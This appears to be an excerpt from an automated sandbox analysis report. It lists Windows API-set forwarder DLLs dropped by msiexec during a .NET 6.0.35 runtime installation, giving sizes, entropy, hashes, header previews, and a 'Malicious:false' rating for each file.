                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.328858083322922
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:IAIEWvhWLIQWYnO/VWQ4eWletp80Hy5qnajsBk9:I5EWvhWLI+UJpslE8
                                                                                                                                                                                                                                                                                                                                  MD5:D92E6A007FC22A1E218552EBFB65DA93
                                                                                                                                                                                                                                                                                                                                  SHA1:3C9909332E94F7B7386664A90F52730F4027A75A
                                                                                                                                                                                                                                                                                                                                  SHA-256:03BD3217EAE0EF68521B39556E7491292DB540F615DA873DD8DA538693B81862
                                                                                                                                                                                                                                                                                                                                  SHA-512:B8B0E6052E68C08E558E72C168E4FF318B1907C4DC5FC1CD1104F5CAE7CC418293013DABBB30C835A5C35A456E1CB22CC352B7AE40F82B9B7311BB7419D854C7
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@......p.....`A........................................p...L............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.41968362445382
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:lC+WvhWRWYnO/VWQ4SWHvD480Hy5qnajsBkffy2:4+WvhWRUGEslECl
                                                                                                                                                                                                                                                                                                                                  MD5:50ABF0A7EE67F00F247BADA185A7661C
                                                                                                                                                                                                                                                                                                                                  SHA1:0CDDAC9AC4DB3BF10A11D4B79085EF9CB3FB84A1
                                                                                                                                                                                                                                                                                                                                  SHA-256:F957A4C261506484B53534A9BE8931C02EC1A349B3F431A858F8215CECFEC3F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:C2694BB5D103BAFF1264926A04D2F0FE156B8815A23C3748412A81CC307B71A9236A0E974B5549321014065E393D10228A0F0004DF9BA677F03B5D244A64B528
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....mR.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.329081455517674
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZfWvhWPWYnO/VWQ4SWR7me4qdsxZAqnajT9CRixc:ZfWvhW/UNezs/Al39wiO
                                                                                                                                                                                                                                                                                                                                  MD5:3039A2F694D26E754F77AECFFDA9ACE4
                                                                                                                                                                                                                                                                                                                                  SHA1:4F240C6133D491A4979D90AFA46C11608372917F
                                                                                                                                                                                                                                                                                                                                  SHA-256:625667EA50B2BD0BAE1D6EB3C7E732E9E3A0DEA21B2F9EAC3A94C71C5E57F537
                                                                                                                                                                                                                                                                                                                                  SHA-512:D2C2A38F3E779AC84593772E11AE70FC8BCFD805903E6010FE37D400B98E37746D4D00555233D36529C53DD80B1DF923714530853A69AA695A493EC548D24598
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......0.........." .........0...............................................@......=.....`A........................................p...`............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.447714045651854
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:gxlAWvhW5EWYnO/VWQ4SWArSZBUuUgxfzfqnajmGYjB:gxlAWvhW5yUbSsIrlStjB
                                                                                                                                                                                                                                                                                                                                  MD5:2EDC82C3DA339A4A138B4E84DC11E580
                                                                                                                                                                                                                                                                                                                                  SHA1:E88F876C9E36D890398630E1B30878AF92DF5B59
                                                                                                                                                                                                                                                                                                                                  SHA-256:E36B72EAFFFFFB09B3F3A615678A72D561B9469A09F3B4891ABA9D809DA937A5
                                                                                                                                                                                                                                                                                                                                  SHA-512:6C1B195B2FABE4D233724133AE3BDF883F287B5ECD9639A838AD558159A07E307E7AE5E5407CE9229DCCDE4BE2CC39EC59506A5FB73B45D04B80330B55E2B85C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...)\Ix.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.368970650031484
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ODWvhWJWYnO/VWQ4mWbAcH2vArqnajKsbTY3:ODWvhWJUrcH24rlGsbTY3
                                                                                                                                                                                                                                                                                                                                  MD5:215E3FA11BE60FEAAE8BD5883C8582F3
                                                                                                                                                                                                                                                                                                                                  SHA1:F5BF8B29FA5C7C177DFEC0DE68927077E160C9AB
                                                                                                                                                                                                                                                                                                                                  SHA-256:FBB9032835D0D564F2F53BBC4192F8A732131B8A89F52F5EF3FF0DAA2F71465F
                                                                                                                                                                                                                                                                                                                                  SHA-512:C555698F9641AF74B4C5BB4CA6385B8D69D5A3D5D48504E42B0C0EB8F65990C96093687BC7EE818AA9C24432247AFAD7DF3BF086010A2EFCD3A1010B2FCD6A31
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......d.........." .........0...............................................@......5.....`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.601897142725442
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:pTvuBL3BBLxWvhWcWYnO/VWQ4mW74j21EhqnajKsxX+:pTvuBL3BXWvhWKUBqslGsxu
                                                                                                                                                                                                                                                                                                                                  MD5:9A8AB7FE8C4CC7604DFF1FBFA57458AA
                                                                                                                                                                                                                                                                                                                                  SHA1:68ED7B6B5191F53B50D6A1A13513DB780AB19211
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9A3D7F8A08AB5BC94ACB1EC1BFFDA90469FEC3B7EECDF7CF5408F3E3682D527
                                                                                                                                                                                                                                                                                                                                  SHA-512:05DAEABBCDE867E63FDE952213FFF42AF05E70AE72643C97060A90DCEA2A88B75947B6F503CB2C33938AFE36AD1BAFBA5008C1BBE839F6498CDA27DA549DAEE9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...P.1..........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..`...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.116096564588074
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:6naOMw3zdp3bwjGzue9/0jCRrndbDWvhWfUCBoliM:POMwBprwjGzue9/0jCRrndbwIJY
                                                                                                                                                                                                                                                                                                                                  MD5:DE5695F26A0BCB54F59A8BC3F9A4ECEF
                                                                                                                                                                                                                                                                                                                                  SHA1:99C32595F3EDC2C58BDB138C3384194831E901D6
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9539FCE90AD8BE582B25AB2D5645772C2A5FB195E602ECDBF12B980656E436A
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF635D5D51CDEA24885AE9F0406F317DDCF04ECB6BFA26579BB2E256C457057607844DED4B52FF1F5CA25ABE29D1EB2B20F1709CF19035D3829F36BBE31F550F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....3..........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.483681194749599
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:WqfWvhWoWYnO/VWQ4mWKNe4XEKup3JdqnajKsztPO/B:WGWvhWWU9X7aJdlGsztP2
                                                                                                                                                                                                                                                                                                                                  MD5:7DDDA921E16582B138A9E7DE445782A0
                                                                                                                                                                                                                                                                                                                                  SHA1:9B2D0080EDA4BA86A69B2C797D2AFC26B500B2D3
                                                                                                                                                                                                                                                                                                                                  SHA-256:EF77B3E4FDFF944F92908B6FEB9256A902588F0CF1C19EB9BF063BB6542ABFFF
                                                                                                                                                                                                                                                                                                                                  SHA-512:C2F4A5505F8D35FBDD7B2ECA641B9ECFCB31FE410B64FDE990D57B1F8FD932DFF3754D9E38F87DB51A75E49536B4B6263D8390C7F0A5E95556592F2726B2E418
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...dIx..........." .........0...............................................@.......:....`A........................................p...l............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.417647805455514
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:RWvhW0WYnO/VWQ4SWKeE+Ztc80Hy5qnajsBkUqS:RWvhWiUxslE5qS
                                                                                                                                                                                                                                                                                                                                  MD5:BF622378D051DB49BDC62ACA9DDF6451
                                                                                                                                                                                                                                                                                                                                  SHA1:EFD8445656A0688E5A8F20243C2419984BB7743E
                                                                                                                                                                                                                                                                                                                                  SHA-256:0BFEDB0D28E41E70BF9E4DA11E83F3A94C2191B5CD5DD45D9E9D439673B830CE
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF32D34C81FDE6EEF83A613CE4F153A7945EECFB1EC936AC6ED674654A4E167EC5E5436185B8064177F5F9273D387CA226C3C9529591180250A9C5C581EC6F70
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....2............" .........0...............................................@.......p....`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6126507489483375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:qF3qWvhWQWYnO/VWQ4SWL7JJsxZAqnajT9CgsLam:qF6WvhW+UA7s/Al39wR
                                                                                                                                                                                                                                                                                                                                  MD5:A56E3E2AA6398CCB355C7CDE81CCB6E5
                                                                                                                                                                                                                                                                                                                                  SHA1:A26273DD41DB7B63D3A79ACF6F4F3CF0381A8F02
                                                                                                                                                                                                                                                                                                                                  SHA-256:25AF1BC31C4A3FB9F1036C9AA51CB0AE8899C499B3EEF4CF7281515C1EA27B47
                                                                                                                                                                                                                                                                                                                                  SHA-512:3D5CEC9E5B42724794282974F637B1FDA8C26ADF01ED19DD2EC4F940E01CD43BDC42E46DC3E62704E62553DE96D3FEA1616C9650AF73CDB557DFCA1B52051A64
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@............`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.978924663768967
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Hck1JzNcKSIGqAWvhWTUpDX7aJdlGsztMs:3cKSswKz7aJGps
                                                                                                                                                                                                                                                                                                                                  MD5:82159E8D92E38C4F287EB9420DCF1F9F
                                                                                                                                                                                                                                                                                                                                  SHA1:2E4436DBE18D943416A388777D05BFE5CB553DE7
                                                                                                                                                                                                                                                                                                                                  SHA-256:0D22CE9D987EFD6886A8DE66A6A678C287D29B15963B4373F73D79DDE42C9827
                                                                                                                                                                                                                                                                                                                                  SHA-512:DCEF1E0C7916C8CD08148962949A996FFC5D46B899CD82DFBCD9BB1BC614622BC8997F1E7D3C4E3D75F2DF07540A4C17F39477CFE97BA7F0BD280CDD52E06F91
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......Y.........." .........0...............................................@.......K....`A........................................p................0...............0...!..............p............................................................................rdata..4...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513848472591714
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:pwQpUwzDfIeOWvhW9WYnO/VWQ4+WWXtplsxZAqnajT9CGl:pZDfIeOWvhWNUFbls/Al39Hl
                                                                                                                                                                                                                                                                                                                                  MD5:74C264CFFC09D183FCB1555B16EA7E4B
                                                                                                                                                                                                                                                                                                                                  SHA1:0B5B08CDF6E749B48254AC811CA09BA95473D47C
                                                                                                                                                                                                                                                                                                                                  SHA-256:A8E2FC077D9A7D2FAA85E1E6833047C90B22C6086487B98FC0E6A86B7BF8BF09
                                                                                                                                                                                                                                                                                                                                  SHA-512:285AFBCC39717510CED2ED096D9F77FC438268ECAA59CFF3CF167FCC538E90C73C67652046B0EE379E0507D6E346AF79D43C51A571C6DD66034F9385A73D00D1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...%p_W.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..,...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.293598211920456
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:dWvhW/WYnO/VWQ4SWYujPUsxZAqnajT9Cl36:dWvhWvUgMs/Al39Eq
                                                                                                                                                                                                                                                                                                                                  MD5:D6F37B232E3F2E944EBCF53A662E852F
                                                                                                                                                                                                                                                                                                                                  SHA1:C10839E941444ED79C2314F90DA34E5742F4E514
                                                                                                                                                                                                                                                                                                                                  SHA-256:5E6AD9502C8411F29BC072EFD08C4FCD09BC3367814269DEDA74A78536FB8375
                                                                                                                                                                                                                                                                                                                                  SHA-512:6E0CF1021EF3FF31895D2B6A9E72084EBE52DE4201D317B12FB8B05A7B1946FDEF65D2B046F8FB25189D3A94F70726121F2E8EAC8239C00EE02EF5EAF57F21C5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata.. ...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.469567491280211
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:aGeVTg6WvhWGWYnO/VWQ4SWupBd80Hy5qnajsBkt2NjY:aGeVTg6WvhWsUldslE8+Y
                                                                                                                                                                                                                                                                                                                                  MD5:6397D5CC116D884D31552F613F748556
                                                                                                                                                                                                                                                                                                                                  SHA1:B76B19FE4D3D5D26D2DEE1983D384E26D961180E
                                                                                                                                                                                                                                                                                                                                  SHA-256:40EB38D84DFD13C8A58211B8273C4B4965148742F08EB6FE8B0830392C37ABC1
                                                                                                                                                                                                                                                                                                                                  SHA-512:4449DA9BAA3F722EB274AC527125F5918A17BC94B243849A0A44F3463E35F368339A58A6AA1E08B83D54D13538C0D52BFCB452A48B8B9A52961BF136256D220E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....C}.........." .........0...............................................@.......T....`A........................................p...<............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.375396134710155
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:v0yyMvJWvhW4WYnO/VWQ4SWQwwV80Hy5qnajsBkrfFIf:zyMvJWvhWmUAIslEAfFI
                                                                                                                                                                                                                                                                                                                                  MD5:D2D7458AB838E738B54FB4D6FA490BF6
                                                                                                                                                                                                                                                                                                                                  SHA1:0CFC5659B23A35C987B96CABBC0D10325316385D
                                                                                                                                                                                                                                                                                                                                  SHA-256:285A481D7BA9859CC28BEDEDD8F05A90BD648A34D66B8C797118920B40E15E4E
                                                                                                                                                                                                                                                                                                                                  SHA-512:62E0ABB2E59D360D6A066E73289AA1B880E7C1A0B7E6C695F40B1E0F2CB11DEB9E54DEBA4045D2454B911AF109EC198F11073874A8F023EB1B71A16A74354A1E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....%fN.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..<...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.889960536352825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:lQMwidv3V0dfpkXc0vVaLnWvhWTULrX7aJdlGsztzO1:xHdv3VqpkXc0vVagQ2L7aJGqO1
                                                                                                                                                                                                                                                                                                                                  MD5:255B18FE8AB465C87FB8AD20D9A63AAC
                                                                                                                                                                                                                                                                                                                                  SHA1:645823B0332ADDABA5E4EF40D421B2DA432FDA5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:E050E1BFBB75A278412380C912266225C3DEE15031468DAE2F6B77FF0617AA91
                                                                                                                                                                                                                                                                                                                                  SHA-512:19244B084AC811B89E0E6A77F9308D20CF4FBB77621D34EEDC19FCD5C8775A33B2D9ADA3F408CBE5806C39745B30C1C1CC25D724DB9377B437D771AE0BF440B1
